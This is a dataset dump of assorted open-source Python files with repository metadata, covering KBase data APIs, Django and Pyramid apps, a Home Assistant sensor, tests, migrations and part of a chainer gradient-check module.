code
stringlengths 2
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 2
1.05M
|
|---|---|---|---|---|---|
"""
Module for base class for Data API objects.
"""
# Imports
# Stdlib
from collections import namedtuple
import logging
import os
import re
try:
import cStringIO as StringIO
except ImportError:
import StringIO as StringIO
# Local
from doekbase.data_api.util import get_logger, log_start, log_end
from doekbase.workspace.client import Workspace
from doekbase.data_api.wsfile import WorkspaceFile
from doekbase.data_api import cache
from doekbase.data_api.util import PerfCollector, collect_performance
# Logging
_log = get_logger('doekbase.data_api.core')
# Globals
REF_PATTERN = re.compile("(.+/.+(/[0-9].+)?)|(ws\.[1-9][0-9]+\.[1-9][0-9]+)")
g_ws_url = "https://ci.kbase.us/services/ws/"
g_shock_url = "https://ci.kbase.us/services/shock-api/"
g_handle_url = "https://ci.kbase.us/services/handle_service/"
g_use_msgpack = True
g_stats = PerfCollector('ObjectAPI')
def fix_docs(cls):
for name, func in vars(cls).items():
if func is not None and func.__doc__ is None:
for parent in cls.__bases__:
if hasattr(parent, name):
parfunc = getattr(parent, name)
if parfunc and hasattr(parfunc, '__doc__'):
func.__doc__ = parfunc.__doc__
break
return cls
#: Name positional parts of WorkspaceInfo tuple
WorkspaceInfo = namedtuple('WorkspaceInfo', [
'id', # ws_id (int)
'workspace', # ws_name
'owner', # username
'moddate', # timestamp
'object', # int
'user_permission', # permission
'globalread', # permission
'lockstat', # lock_status
'metadata' # usermeta
])
def get_token():
try:
token = os.environ["KB_AUTH_TOKEN"]
except KeyError:
raise Exception(
"Missing authentication token! Set KB_AUTH_TOKEN environment variable.")
class ObjectAPI(object):
"""
Generic Object API for basic properties and actions
of a KBase Data Object.
In general, users will not instantiate this object directly, but instead
they will create a biology-specific object like `TaxonAPI` or
`GenomeAnnotationAPI`. However, methods in this class may be used to get
basic shared properties like provenance or metadata.
If you find yourself using some form of :meth:`get_data` or :meth:`get_data_subset` frequently,
you should consider wrapping those calls in a higher-level method that is
specific to the kind of data you want.
"""
def __init__(self, services=None, token=None, ref=None):
"""Create new object.
Args:
services (dict): Service configuration dictionary. Required keys:
* workspace_service_url: URL for Workspace, such as `https://ci.kbase.us/services/ws/`
ref (str): Object reference, which can be the name of the object
(although this is not unique), or a numeric identifier in the
format `A/B[/C]` where A is the number of the workspace, B is the
number identifying the object, and C is the "version" number of
the object.
"""
if services is None or type(services) != type({}):
raise TypeError("You must provide a service configuration dictionary! Found {0}".format(type(services)))
elif not services.has_key("workspace_service_url"):
raise KeyError("Expecting workspace_service_url key!")
if ref is None:
raise TypeError("Missing object reference!")
elif type(ref) != type("") and type(ref) != type(unicode()):
raise TypeError("Invalid reference given, expected string! "
"Found {0}".format(type(ref)))
elif re.match(REF_PATTERN, ref) is None:
raise TypeError("Invalid workspace reference string! Found {0}"
.format(ref))
self.services = services
self.ref = ref
self._token = None
ws_url = services["workspace_service_url"]
local_workspace = False
if '://' in ws_url: # assume a real Workspace server
if token is None or len(token.strip()) == 0:
self._token = get_token()
else:
self._token = token
_log.debug('Connect to Workspace service at {}'.format(ws_url))
self.ws_client = Workspace(ws_url, token=self._token)
else:
_log.debug('Load from Workspace file at {}'.format(ws_url))
local_workspace = True
self.ws_client = self._init_ws_from_files(ws_url)
info_values = self.ws_client.get_object_info_new({
"objects": [{"ref": self.ref}],
"includeMetadata": 0,
"ignoreErrors": 0})
if not info_values:
raise ValueError("Cannot find object: {}".format(self.ref))
oi = info_values[0]
self._info = {
"object_id": oi[0],
"object_name": oi[1],
"object_reference": "{0}/{1}".format(oi[6],oi[0]),
"object_reference_versioned": "{0}/{1}/{2}".format(oi[6],oi[0],oi[4]),
"type_string": oi[2],
"save_date": oi[3],
"version": oi[4],
"saved_by": oi[5],
"workspace_id": oi[6],
"workspace_name": oi[7],
"object_checksum": oi[8],
"object_size": oi[9],
"object_metadata": oi[10]
}
self._id = self._info["object_id"]
self._name = self._info["object_name"]
self._typestring = self.ws_client.translate_to_MD5_types(
[self._info["type_string"]]).values()[0]
self._version = str(self._info["version"])
self._schema = None
self._history = None
self._provenance = None
self._data = None
# Init stats
self._stats = g_stats
# Init the caching object. Pass in whether the object is
# publically available (which can determine whether it is cached)
if local_workspace:
global_read = True # Local file-workspace objects are public
else:
wsinfo = self.ws_client.get_workspace_info({
'id': self._info['workspace_id']})
wsinfo_obj = WorkspaceInfo(*wsinfo)
global_read = (wsinfo_obj.globalread == 'r')
self._cache = cache.ObjectCache(
self._info["object_reference_versioned"],
is_public=global_read)
# TODO always use a versioned reference to the data object
#self.ref = self._info["object_reference_versioned"]
@property
def stats(self):
return self._stats
@property
def cache_stats(self):
return self._cache.stats
def _init_ws_from_files(self, path):
ext = '.msgpack'
extlen = len(ext)
WorkspaceFile.use_msgpack = True
client = WorkspaceFile(path)
num_loaded = 0
for name in os.listdir(path):
if name.endswith(ext):
ref = name[:-extlen]
t0 = log_start(_log, 'load', level=logging.DEBUG,
kvp={'ref': ref})
client.load(ref)
log_end(_log, t0, 'client.load', level=logging.DEBUG,
kvp={'ref': ref})
num_loaded += 1
if num_loaded == 0:
raise ValueError('No files with extension "{e}" found in path {p}'
.format(e=ext, p=path))
return client
@collect_performance(g_stats)
def get_schema(self):
"""
Retrieve the schema associated with this object.
Returns:
string"""
if self._schema is None:
self._schema = self.ws_client.get_type_info(self.get_info()["type_string"])
return self._schema
@collect_performance(g_stats)
def get_typestring(self):
"""
Retrieve the type identifier string.
Returns:
string"""
return self._typestring
@collect_performance(g_stats)
def get_info(self):
"""Retrieve basic properties about this object.
Returns:
dict
object_id
object_name
object_reference
object_reference_versioned
type_string
save_date
version
saved_by
workspace_id
workspace_name
object_checksum
object_size
object_metadata"""
return self._info
@collect_performance(g_stats)
def get_history(self):
"""
Retrieve the recorded history of this object describing how it has been modified.
Returns:
list<dict>
object_id
object_name
object_reference
object_reference_versioned
type_string
save_date
version
saved_by
workspace_id
workspace_name
object_checksum
object_size
object_metadata
"""
if self._history == None:
history_list = self.ws_client.get_object_history({"ref": self.ref})
self._history = list()
for object_info in history_list:
self._history.append({
"object_id": object_info[0],
"object_name": object_info[1],
"object_reference": "{0}/{1}".format(object_info[6],object_info[0]),
"object_reference_versioned": "{0}/{1}/{2}".format(object_info[6],
object_info[0],
object_info[4]),
"type_string": object_info[2],
"save_date": object_info[3],
"version": object_info[4],
"saved_by": object_info[5],
"workspace_id": object_info[6],
"workspace_name": object_info[7],
"object_checksum": object_info[8],
"object_size": object_info[9],
"object_metadata": object_info[10]})
return self._history
@collect_performance(g_stats)
def get_provenance(self):
"""
Retrieve the recorded provenance of this object describing how to recreate it.
Returns:
list<dict>
time
service_name
service_version
service_method
method_parameters
script_name
script_version
script_command_line
input_object_references
validated_object_references
intermediate_input_ids
intermediate_output_ids
external_data
description
"""
if self._provenance is None:
result = self.ws_client.get_object_provenance([{"ref": self.ref}])
if len(result) > 0:
provenance_list = result[0]["provenance"]
else:
provenance_list = list()
self._provenance = list()
copy_keys = {"time": "time",
"service": "service_name",
"service_ver": "service_version",
"method": "service_method",
"method_params": "method_parameters",
"script": "script_name",
"script_ver": "script_version",
"script_command_line": "script_command_line",
"input_ws_objects": "input_object_references",
"resolved_ws_objects": "validated_object_references",
"intermediate_incoming": "intermediate_input_ids",
"intermediate_outgoing": "intermediate_output_ids",
"external_data": "external_data",
"description": "description"}
for object_provenance in provenance_list:
action = dict()
for k in copy_keys:
if k in object_provenance:
if isinstance(object_provenance[k], list) and len(object_provenance[k]) == 0:
continue
action[copy_keys[k]] = object_provenance[k]
self._provenance.append(action)
return self._provenance
@collect_performance(g_stats)
def get_id(self):
"""
Retrieve the internal identifier for this object.
Returns:
string"""
return self._id
@collect_performance(g_stats)
def get_version(self):
"""
Retrieve the version identifier for this object.
Returns:
string"""
return self._version
@collect_performance(g_stats)
def get_name(self):
"""
Retrieve the name assigned to this object.
Returns:
string"""
return self._name
@collect_performance(g_stats)
def get_data(self):
"""Retrieve object data.
Returns:
dict (contents according to object type)"""
return self._cache.get_data(self._get_data_ws)
def _get_data_ws(self):
return self.ws_client.get_objects([{"ref": self.ref}])[0]["data"]
@collect_performance(g_stats)
def get_data_subset(self, path_list=None):
"""Retrieve a subset of data from this object, given a list of paths
to the data elements.
Args:
path_list (list): List of paths, each a string of node names
separated by forward slashes, e.g.
['a/bee/sea', 'd/ee/eph/gee']
Returns:
dict (contents according to object type and data requested)"""
return self._cache.get_data_subset(self._get_data_subset_ws,
path_list=path_list)
def _get_data_subset_ws(self, path_list=None):
return self.ws_client.get_object_subset([{"ref": self.ref,
"included": path_list}])[0]["data"]
@collect_performance(g_stats)
def get_referrers(self, most_recent=True):
"""Retrieve a dictionary that indicates by type what objects are
referring to this object.
Args:
most_recent: True or False, defaults to True indicating that results
should be restricted to the latest version of any referencing object.
If this parameter is False, results will contain all versions of any
referencing objects.
Returns:
dict typestring -> object_reference"""
referrers = self.ws_client.list_referencing_objects([{"ref": self.ref}])[0]
# sort all object references in descending order by time
referrers = sorted(referrers, cmp=lambda a,b: a[3] > b[3])
object_refs_by_type = {}
# keep track of which objects we have seen so far, the first instance will be the latest
# so only keep that reference
found_objects = {}
for x in referrers:
typestring = self.ws_client.translate_to_MD5_types([x[2]]).values()[0]
if typestring not in object_refs_by_type:
object_refs_by_type[typestring] = []
unversioned_ref = str(x[6]) + "/" + str(x[0])
if most_recent and unversioned_ref in found_objects:
continue
# Mark an entry for a new object
found_objects[unversioned_ref] = None
object_refs_by_type[typestring].append(str(x[6]) + "/" + str(x[0]) + "/" + str(x[4]))
return object_refs_by_type
@collect_performance(g_stats)
def copy(self, to_ws=None):
"""
Performs a naive object copy to a target workspace. A naive object copy is a simple
copy that only generates a copy object of this entity, but any referencing entities
are not included or considered. More specific object copies should be implemented by
specific types that understand their copy semantics for children and other referencing
or referenced objects.
Args:
to_ws : the target workspace to copy the object to, which the user must have permission
to write to."""
name = self.get_name()
try:
return self.ws_client.copy_object({"from": {"ref": self.ref}, "to": {"workspace": to_ws, "name": name}})
except Exception, e:
return {"error": e.message}
def __eq__(self, other):
"""Test equality by underlying KBase object ID.
"""
#print("@@ obj. eq called")
return self._id == other._id
|
kkellerlbl/data_api
|
lib/doekbase/data_api/core.py
|
Python
|
mit
| 16,991
|
import exploration_bidder
__all__ = ['exploration_bidder']
|
strands-project/strands_exploration
|
exploration_bid_manager/src/exploration_bid_manager/__init__.py
|
Python
|
mit
| 59
|
from django.contrib.auth.models import User
from django.contrib.sites.models import Site
from socialregistration.models import (FacebookProfile, TwitterProfile, OpenIDProfile)
class Auth(object):
def get_user(self, user_id):
try:
return User.objects.get(pk=user_id)
except User.DoesNotExist:
return None
class FacebookAuth(Auth):
def authenticate(self, uid=None):
try:
return FacebookProfile.objects.get(
uid=uid,
site=Site.objects.get_current()
).user
except FacebookProfile.DoesNotExist:
return None
class TwitterAuth(Auth):
def authenticate(self, twitter_id=None):
try:
return TwitterProfile.objects.get(
twitter_id=twitter_id,
site=Site.objects.get_current()
).user
except TwitterProfile.DoesNotExist:
return None
class OpenIDAuth(Auth):
def authenticate(self, identity=None):
try:
return OpenIDProfile.objects.get(
identity=identity,
site=Site.objects.get_current()
).user
except OpenIDProfile.DoesNotExist:
return None
|
coxmediagroup/django-socialregistration
|
socialregistration/auth.py
|
Python
|
mit
| 1,238
|
import datetime
from pyramid.view import view_config
from couchdbkit import *
import logging
log = logging.getLogger(__name__)
class Page(Document):
author = StringProperty()
page = StringProperty()
content = StringProperty()
date = DateTimeProperty()
@view_config(route_name='home', renderer='templates/mytemplate.pt')
def my_view(request):
def get_data():
return list(request.db.view('lists/pages', startkey=['home'], \
endkey=['home', {}], include_docs=True))
page_data = get_data()
if not page_data:
Page.set_db(request.db)
home = Page(
author='Wendall',
content='Using CouchDB via couchdbkit!',
page='home',
date=datetime.datetime.utcnow()
)
# save page data
home.save()
page_data = get_data()
doc = page_data[0].get('doc')
return {
'project': 'pyramid_couchdb_example',
'info': request.db.info(),
'author': doc.get('author'),
'content': doc.get('content'),
'date': doc.get('date')
}
|
benoitc/couchdbkit
|
examples/pyramidapp/pyramid_couchdb_example/views.py
|
Python
|
mit
| 1,100
|
"""
Currency exchange rate support that comes from Yahoo Finance.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.yahoo_finance/
"""
import logging
from datetime import timedelta
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import ATTR_ATTRIBUTION
from homeassistant.helpers.entity import Entity
from homeassistant.util import Throttle
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['yahoo-finance==1.3.2']
_LOGGER = logging.getLogger(__name__)
ATTR_CHANGE = 'Change'
ATTR_OPEN = 'open'
ATTR_PREV_CLOSE = 'prev_close'
CONF_ATTRIBUTION = "Stock market information provided by Yahoo! Inc."
CONF_SYMBOLS = 'symbols'
DEFAULT_NAME = 'Yahoo Stock'
DEFAULT_SYMBOL = 'YHOO'
ICON = 'mdi:currency-usd'
MIN_TIME_BETWEEN_UPDATES = timedelta(minutes=5)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_SYMBOLS, default=[DEFAULT_SYMBOL]):
vol.All(cv.ensure_list, [cv.string]),
})
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the Yahoo Finance sensor."""
from yahoo_finance import Share
symbols = config.get(CONF_SYMBOLS)
dev = []
for symbol in symbols:
if Share(symbol).get_price() is None:
_LOGGER.warning("Symbol %s unknown", symbol)
break
data = YahooFinanceData(symbol)
dev.append(YahooFinanceSensor(data, symbol))
add_devices(dev)
class YahooFinanceSensor(Entity):
"""Representation of a Yahoo Finance sensor."""
def __init__(self, data, symbol):
"""Initialize the sensor."""
self._name = symbol
self.data = data
self._symbol = symbol
self._state = None
self._unit_of_measurement = None
self.update()
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity, if any."""
return self._symbol
@property
def state(self):
"""Return the state of the sensor."""
return self._state
@property
def device_state_attributes(self):
"""Return the state attributes."""
if self._state is not None:
return {
ATTR_ATTRIBUTION: CONF_ATTRIBUTION,
ATTR_CHANGE: self.data.price_change,
ATTR_OPEN: self.data.price_open,
ATTR_PREV_CLOSE: self.data.prev_close,
}
@property
def icon(self):
"""Return the icon to use in the frontend, if any."""
return ICON
def update(self):
"""Get the latest data and updates the states."""
_LOGGER.debug("Updating sensor %s - %s", self._name, self._state)
self.data.update()
self._state = self.data.state
class YahooFinanceData(object):
"""Get data from Yahoo Finance."""
def __init__(self, symbol):
"""Initialize the data object."""
from yahoo_finance import Share
self._symbol = symbol
self.state = None
self.price_change = None
self.price_open = None
self.prev_close = None
self.stock = Share(self._symbol)
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def update(self):
"""Get the latest data and updates the states."""
self.stock.refresh()
self.state = self.stock.get_price()
self.price_change = self.stock.get_change()
self.price_open = self.stock.get_open()
self.prev_close = self.stock.get_prev_close()
|
srcLurker/home-assistant
|
homeassistant/components/sensor/yahoo_finance.py
|
Python
|
mit
| 3,667
|
"""
* Mini-Max Sum (Python)
* HackerRank Algorithm Challenge
* https://www.hackerrank.com/challenges/mini-max-sum
*
* michael@softwareontheshore.com
*
* The goal is to find the minimum sum and the maximum sum of 5 numbers by only using 4.
"""
##arr = map(int, raw_input().strip().split(' '))
testA = [1, 2, 3, 4, 5] ##10 14
testB = [2, 5, 1, 3, 4] ##10 14
testC = [6, 5, 9, 29, 2] ## 49 22
def sumMiniMax(arr):
maximum = sum(sorted(arr)[1:5])
minimum = sum(sorted(arr)[0:4])
return str(minimum) + ' ' + str(maximum)
print sumMiniMax(testC)
|
masharp/algorithm-challenges-n-stuff
|
coding-challenges/hacker-rank/algorithms/MiniMaxSum.py
|
Python
|
mit
| 566
|
import numpy as np
import pytest
from landlab import FieldError, RasterModelGrid
from landlab.utils.return_array import return_array_at_link, return_array_at_node
def test_no_field():
mg = RasterModelGrid((10, 10))
with pytest.raises(FieldError):
return_array_at_node(mg, "spam")
with pytest.raises(FieldError):
return_array_at_link(mg, "spam")
def test_return_array():
mg = RasterModelGrid((10, 10))
node_vals = np.arange(mg.number_of_nodes)
out = return_array_at_node(mg, node_vals)
np.testing.assert_array_equal(np.arange(mg.number_of_nodes), out)
link_vals = np.arange(mg.number_of_links)
out = return_array_at_link(mg, link_vals)
np.testing.assert_array_equal(np.arange(mg.number_of_links), out)
|
cmshobe/landlab
|
tests/utils/test_return_grid.py
|
Python
|
mit
| 765
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Emblem'
db.create_table(u'chat_emblem', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('url', self.gf('django.db.models.fields.CharField')(max_length=150)),
('name', self.gf('django.db.models.fields.CharField')(max_length=40)),
))
db.send_create_signal(u'chat', ['Emblem'])
# Adding model 'Roll'
db.create_table(u'chat_roll', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=20)),
))
db.send_create_signal(u'chat', ['Roll'])
# Adding model 'UserProfile'
db.create_table(u'chat_userprofile', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], unique=True)),
('ign', self.gf('django.db.models.fields.CharField')(unique=True, max_length=75)),
('verified', self.gf('django.db.models.fields.BooleanField')(default=False)),
('isMod', self.gf('django.db.models.fields.BooleanField')(default=False)),
('banned', self.gf('django.db.models.fields.BooleanField')(default=False)),
('primRole', self.gf('django.db.models.fields.related.ForeignKey')(related_name='primary', to=orm['chat.Roll'])),
('secRole', self.gf('django.db.models.fields.related.ForeignKey')(related_name='secondary', to=orm['chat.Roll'])),
('tier', self.gf('django.db.models.fields.CharField')(max_length=20, blank=True)),
('division', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
))
db.send_create_signal(u'chat', ['UserProfile'])
# Adding model 'Comments'
db.create_table(u'chat_comments', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
('profile', self.gf('django.db.models.fields.related.ForeignKey')(default=False, to=orm['chat.UserProfile'])),
('text', self.gf('django.db.models.fields.CharField')(max_length=255)),
('datetime', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
))
db.send_create_signal(u'chat', ['Comments'])
def backwards(self, orm):
# Deleting model 'Emblem'
db.delete_table(u'chat_emblem')
# Deleting model 'Roll'
db.delete_table(u'chat_roll')
# Deleting model 'UserProfile'
db.delete_table(u'chat_userprofile')
# Deleting model 'Comments'
db.delete_table(u'chat_comments')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'chat.comments': {
'Meta': {'ordering': "['datetime']", 'object_name': 'Comments'},
'datetime': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'profile': ('django.db.models.fields.related.ForeignKey', [], {'default': 'False', 'to': u"orm['chat.UserProfile']"}),
'text': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'chat.emblem': {
'Meta': {'object_name': 'Emblem'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '150'})
},
u'chat.roll': {
'Meta': {'object_name': 'Roll'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '20'})
},
u'chat.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'banned': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'division': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ign': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75'}),
'isMod': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'primRole': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'primary'", 'to': u"orm['chat.Roll']"}),
'secRole': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'secondary'", 'to': u"orm['chat.Roll']"}),
'tier': ('django.db.models.fields.CharField', [], {'max_length': '20', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'unique': 'True'}),
'verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['chat']
|
crazyskateface/LC
|
chat/migrations/0014_initial.py
|
Python
|
mit
| 8,645
|
#-*- coding: utf-8 -*-
import functools
from django.contrib import messages
from django.utils.translation import ugettext as _
from .ratelimit import RateLimit
__all__ = ['ratelimit', ]
def ratelimit(method=None, field=None, rate='5/5m'):
def decorator(func):
@functools.wraps(func)
def wrapper(request, *args, **kwargs):
rl = RateLimit(request, func.__name__, method=method, field=field, rate=rate)
request.is_limited = rl.is_limited()
if request.is_limited:
messages.error(request, _('Too many submissions, wait %(time)s.') % {'time': rate.split('/')[1], })
return func(request, *args, **kwargs)
return wrapper
return decorator
|
bjorncooley/rainforest_makers
|
spirit/utils/ratelimit/decorators.py
|
Python
|
mit
| 737
|
#!/usr/bin/env python3
""" Script for getting status information about this cluster of central servers.
By default the request is made to the local server and reflects the view of the
cluster as seen by the local node.
"""
import requests
import json
import sys
HOST = "localhost"
PORT = 8083 # The internal listening port of the Jetty web server.
TARGET_URL = "http://%s:%s/public_system_status/check_ha_cluster_status" % (
HOST, PORT)
r = requests.get(TARGET_URL)
if r.status_code != requests.codes.OK:
print("Failed to check the status of the HA cluster: %s (%s)" % (
r.status_code, r.text))
sys.exit(1)
try:
result = json.loads(r.text).get('ha_node_status', dict())
if not result.get('ha_configured'):
print("This central server is not part of an HA cluster")
sys.exit(0)
print("\nSUMMARY OF CLUSTER STATUS:")
print(" All nodes: %s" % ("OK" if result.get("all_nodes_ok") else "NOK"))
print(" Configuration: %s" % (
"OK" if result.get("configuration_ok") else "NOK"))
print("\nDETAILED CLUSTER STATUS INFORMATION:")
print(json.dumps(result, sort_keys=True, indent=4, separators=(',', ': ')))
except Exception as e:
print("Failed to parse the status of the HA cluster: %s" % (e))
sys.exit(1)
|
ria-ee/X-Road
|
src/packages/xroad/cluster/check_ha_cluster_status.py
|
Python
|
mit
| 1,290
|
import itertools
def cached(func):
def wrapper(*args, **kwargs):
host = args[0]
if not hasattr(host, 'cache'):
setattr(host, 'cache', {})
if func not in host.cache:
host.cache[func] = func(*args, **kwargs)
return host.cache[func]
return wrapper
def cached_with_args(func):
def wrapper(*args, **kwargs):
host = args[0]
if not hasattr(host, 'cache'):
setattr(host, 'cache', {})
if func not in host.cache:
host.cache[func] = {}
cached_args = tuple(itertools.chain(args, kwargs.values()))
if cached_args not in host.cache[func]:
host.cache[func][cached_args] = func(*args, **kwargs)
return host.cache[func]
return wrapper
def invalidate_cache(func):
def wrapper(*args, **kwargs):
host = args[0]
if hasattr(host, 'cache'):
host.cache = {}
return func(*args, **kwargs)
return wrapper
|
jpalladino84/Python-Roguelike-Framework
|
util/decorators.py
|
Python
|
mit
| 992
|
import math
import warnings
import numpy
import six
from chainer.backends import cuda
from chainer import configuration
from chainer import FunctionNode
from chainer import testing
from chainer import variable
class NondifferentiableError(Exception):
pass
def _copy_arrays(xs):
xp = cuda.get_array_module(*xs)
return [xp.array(x, order='C', dtype=numpy.float64, copy=True) for x in xs]
def numerical_grad(
f, inputs, grad_outputs, eps=1e-3,
detect_nondifferentiable=False, diff_atol=0, diff_rtol=1e-2,
center_outputs=None):
"""Computes numerical gradient by finite differences.
This function is used to implement gradient check. For usage example, see
unit tests of :mod:`chainer.functions`.
By default, ``numerical_grad`` computes the gradient to the first order of
``eps``.
Args:
f (callable): Python function with no arguments that runs forward
computation and returns the result.
inputs (tuple of arrays): Tuple of arrays that should be treated as
inputs. Each element of them is slightly modified to realize
numerical gradient by finite differences.
grad_outputs (tuple of arrays): Tuple of arrays that are treated as
output gradients.
eps (float): Epsilon value of finite differences.
detect_nondifferentiable (bool):
``False`` by default.
If ``True``, ``numerical_grad`` checks whether ``f`` is
differentiable at ``inputs``.
It requires evaluation of ``f`` at 5 points instead of 2.
As a side effect, the accuracy of numerical gradient will be
increased to the third order of ``eps``.
If it turns out that ``f`` is non-differentiable at ``input``,
``numerical_grad`` raises
:class:`~chainer.gradient_check.NondifferentiableError`.
diff_atol (float):
Absolute tolerance of fitting error of non-differentiable point
detection.
diff_rtol (float):
Tolerance of fitting error of non-differentiable point detection
relative to the output values of ``f``.
center_outputs (tuple of arrays or None):
Only used if ``detect_nondifferentiable`` is ``True``.
If specified, these arrays are used as the outputs of ``f`` at
``inputs``.
Otherwise, it is calculated.
It can be used to reduce the computation if these arrays are
already calculated before calling ``numerical_grad``.
Returns:
tuple: Numerical gradient arrays corresponding to ``inputs``.
"""
assert eps > 0
for x in inputs:
if x.dtype.kind != 'f':
raise RuntimeError(
'The dtype of input arrays must be kind of float')
inputs = tuple(inputs)
grad_outputs = tuple(grad_outputs)
gpu = any(isinstance(x, cuda.ndarray) for x in inputs + grad_outputs)
cpu = any(isinstance(x, numpy.ndarray) for x in inputs + grad_outputs)
if gpu and cpu:
raise RuntimeError('Do not mix GPU and CPU arrays in `numerical_grad`')
if gpu:
xp = cuda.cupy
numerical_grad_kernel_1 = cuda.reduce(
'T y1, T y2, U gy, T eps', 'V gxi',
'(y1 - y2) * gy', 'a + b', 'gxi += a / (eps * 2)', '0',
'numerical_grad_kernel_1'
)
numerical_grad_kernel_3 = cuda.reduce(
'T y1, T y2, T y3, T y4, U gy, T eps', 'V gxi',
'(-y1 + 8 * y2 - 8 * y3 + y4) * gy',
'a + b', 'gxi += a / (eps * 6)', '0',
'numerical_grad_kernel_3'
)
else:
xp = numpy
grads = [xp.zeros(x.shape, numpy.float64) for x in inputs]
if detect_nondifferentiable:
if center_outputs is None:
ys0 = _copy_arrays(f())
else:
ys0 = center_outputs
nout = len(ys0)
shapes = [_.shape for _ in ys0]
sizes = numpy.array([_.size for _ in ys0])
cumsizes = numpy.cumsum(sizes)
# Evaluate func at a single input
def eval_func(x, i, delta, orig):
x[i] = orig + delta
y = _copy_arrays(f())
x[i] = orig
return y
# An iteration on a single input displacement
def iterate_single_input(i_in, x, orig_x, i):
orig = orig_x[i]
# `yss` holds a list of output arrays for each of 2 or 5 sampling
# points.
if detect_nondifferentiable:
yss = [
eval_func(x, i, -eps * 1., orig),
eval_func(x, i, -eps * .5, orig),
ys0,
eval_func(x, i, +eps * .5, orig),
eval_func(x, i, +eps * 1., orig),
]
else:
yss = [
eval_func(x, i, -eps * 1, orig),
eval_func(x, i, +eps * 1, orig),
]
if detect_nondifferentiable:
# Detect non-differentiable point by quadratic fitting
# Check for non-finite output.
# If any single element in the output arrays has different
# finiteness among sampled points, that means this is a
# non-differentiable point.
